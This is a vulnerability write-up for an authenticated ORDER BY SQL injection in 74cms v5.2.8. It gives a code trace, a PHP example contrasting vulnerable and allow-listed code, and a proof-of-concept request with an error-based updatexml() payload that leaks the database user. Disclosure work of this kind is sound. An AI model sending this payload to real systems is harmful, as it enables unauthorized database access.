
74cms v5.2.8 SQLI

Detail

The vulnerability is in the _list method of Common/Controller/BackendController.class.php. _list uses I() to read the sort and order request parameters and concatenates them into $order_by.

$order_by is then concatenated into the SQL query string, so both parameters reach the ORDER BY clause unescaped and the query is injectable. Parameter binding does not help here: ORDER BY takes identifiers and keywords, not values, so the only sound fix is to allow-list the column name and the sort direction.

_list is called by the index method.

Taking Admin/Controller/AdController.class.php as an example: AdController extends BackendController, and its category method calls index(), so the injection is reachable through m=Admin&c=Ad&a=category.
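The following is an added example, not code from 74cms: it reproduces the concatenation pattern described above in plain PHP (no ThinkPHP, so I() is replaced by a plain array lookup) and places an allow-listed version beside it. The table name ad_category and the column names are assumptions chosen for illustration; the request parameters are the ones from the PoC below.

```php
<?php
// Added example (not 74cms code): an ORDER BY clause assembled by string
// concatenation from request parameters, next to an allow-listed version.
// Table and column names are assumed for illustration.

// Vulnerable pattern: sort and order are joined straight into $order_by and
// $order_by is joined straight into the query, as in the affected _list method.
function buildOrderByVulnerable(array $params): string
{
    $sort  = $params['sort']  ?? 'id';
    $order = $params['order'] ?? 'desc';
    $order_by = $sort . ' ' . $order;          // attacker-controlled text
    return "SELECT * FROM ad_category ORDER BY " . $order_by;
}

// Hardened pattern: ORDER BY cannot be parameterised, so only a known column
// name and one of the two sort directions are ever placed in the query.
function buildOrderBySafe(array $params): string
{
    $allowedSort = ['id', 'name', 'sort'];      // assumed column list
    $sort  = $params['sort']  ?? 'id';
    $order = strtolower($params['order'] ?? 'desc');
    if (!in_array($sort, $allowedSort, true)) {
        $sort = 'id';                           // unknown column: fall back
    }
    if ($order !== 'asc' && $order !== 'desc') {
        $order = 'desc';                        // anything else is rejected
    }
    return "SELECT * FROM ad_category ORDER BY `$sort` $order";
}

// Constructed input mirroring the PoC query string (sort=1&order=and updatexml(...)).
$poc = [
    'sort'  => '1',
    'order' => 'and updatexml(0,concat(0x7e,user()),0)',
];

// The first query carries the updatexml() call into ORDER BY; the second
// reduces the same input to ORDER BY `id` desc.
echo buildOrderByVulnerable($poc), "\n";
echo buildOrderBySafe($poc), "\n";
```

Run it with `php example.php` and compare the two printed statements: the vulnerable one contains the updatexml() call verbatim, which is exactly what MySQL evaluates when the request below is sent.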

PoC

Log in as an administrator and send the following request (the injection is post-authentication; the controller is only reachable with an admin session).

GET /74cms/upload/index.php?m=Admin&c=Ad&a=category&sort=1&order=and+updatexml(0,concat(0x7e,user()),0) HTTP/1.1
Host: [::]
Upgrade-Insecure-Requests: 1
DNT: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://[::]/74cms/upload/index.php?m=Admin&c=index&a=index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: XDEBUG_SESSION=PHPSTORM; think_template=default; PHPSESSID=4gibptgp8kflrc0f9sd2t8pfm0; think_language=zh-CN
Connection: close

Result: the injection succeeds. MySQL raises an XPATH syntax error for the updatexml() call, and the error message echoes the concat() argument, so the output of user() is returned in the error text.
